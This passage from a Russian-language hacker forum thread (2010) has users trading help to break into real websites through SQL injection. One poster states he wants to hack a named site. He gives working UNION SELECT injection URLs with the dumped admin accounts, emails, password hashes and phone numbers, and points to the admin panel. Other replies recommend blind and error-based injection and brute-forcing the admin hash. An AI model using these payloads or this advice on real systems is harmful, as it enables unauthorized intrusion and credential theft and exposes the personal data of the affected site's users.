 |
|
11.06.2010, 11:09
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Ну я примерно так и понял 
Делать-то что?(
И еще, в другой скуле при юнионе пишет:
Invalid query: Unknown column 'createTime' in 'field list'
Как крутить?( |
|
|
11.06.2010, 20:05
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
Попробуй крутить как blind, error-base blind sql injection, не факт, что сработает, но как вариант, думаю можно попробовать
|
|
|
|
11.06.2010, 20:16
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Очень хочется взломать этот сайт! Что можете предложить?
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,concat_ws(0x3a,id,
md5_id,
full_name,
user_name,
user_email,
user_level,
pwd,
address,
country,
tel,
fax,
website,
date,
users_ip,
approved,
activation_code,
banned,
ckey,
ctime),6,7,8+from+etrack+--+
54::admin:admin:admin@localhost:5:4c09e75fa6fe3603 8ac240e9e4e0126cedef6d8c85cf0a1ae:admin:Switzerlan d:4433093999:::2010-05-04::1:0:0:uqd1y4v:1272992243
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,concat_ws(0x3a,id,
full_name,
user_name,
user_pwd,
user_email,
activation_code,
joined,
country,
user_activated),6,7,8+from+users+--+
6:admin::5f0210ed3fa1e3301e5fac5928cc9712:web@sisc o.com.sa:8971:2008-12-30:India:1
админка: www.rsgt.com/admin
|
|
|
|
11.06.2010, 20:18
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
2FlaktW, конкретно, в чем проблема?
|
|
|
|
11.06.2010, 20:20
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Сообщение от Bb0y
Попробуй крутить как blind, error-base blind sql injection, не факт, что сработает, но как вариант, думаю можно попробовать
Спасибо, стасок помог уже, раскрутил
|
|
|
|
11.06.2010, 20:43
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами:
9534473
Репутация:
18
|
|
Как можно обойти двойной запрос??
PHP код:
Query: SELECT c.name AS category, b.category AS category_ident, b.reported_against AS reported_against_ident, b.release_fixed AS release_fixed_ident, s.name AS state, b.state AS state_ident, b.submit_date AS submit_date, b.submit_time AS submit_time, b.fix_date AS fix_date, b.fix_time AS fix_time, b.synopsis AS synopsis, b.duplicate AS duplicate, o.name AS os, b.os AS os_ident, b.name AS name, b.email AS email, b.repid AS repid FROM bugs b, categories c, states s, oslist o WHERE c.ident = b.category AND s.ident = b.state AND o.ident = b.os AND b.ident = -4960 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
|
|
|
|
11.06.2010, 20:50
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от Bb0y
2FlaktW, конкретно, в чем проблема?
Попасть в админку!
|
|
|
|
11.06.2010, 20:59
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
2FlaktW, хэш админа 5f0210ed3fa1e3301e5fac5928cc9712 пробруть, в онлайн базах вроде не нашел
|
|
|
|
11.06.2010, 20:59
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами:
9534473
Репутация:
18
|
|
FlaktW у тебя же есть логин и пароль от админки...
тут никаких проблем нету..
|
|
|
|
11.06.2010, 21:00
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
2GOGA075, blind, error-base blind техники пробовал?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
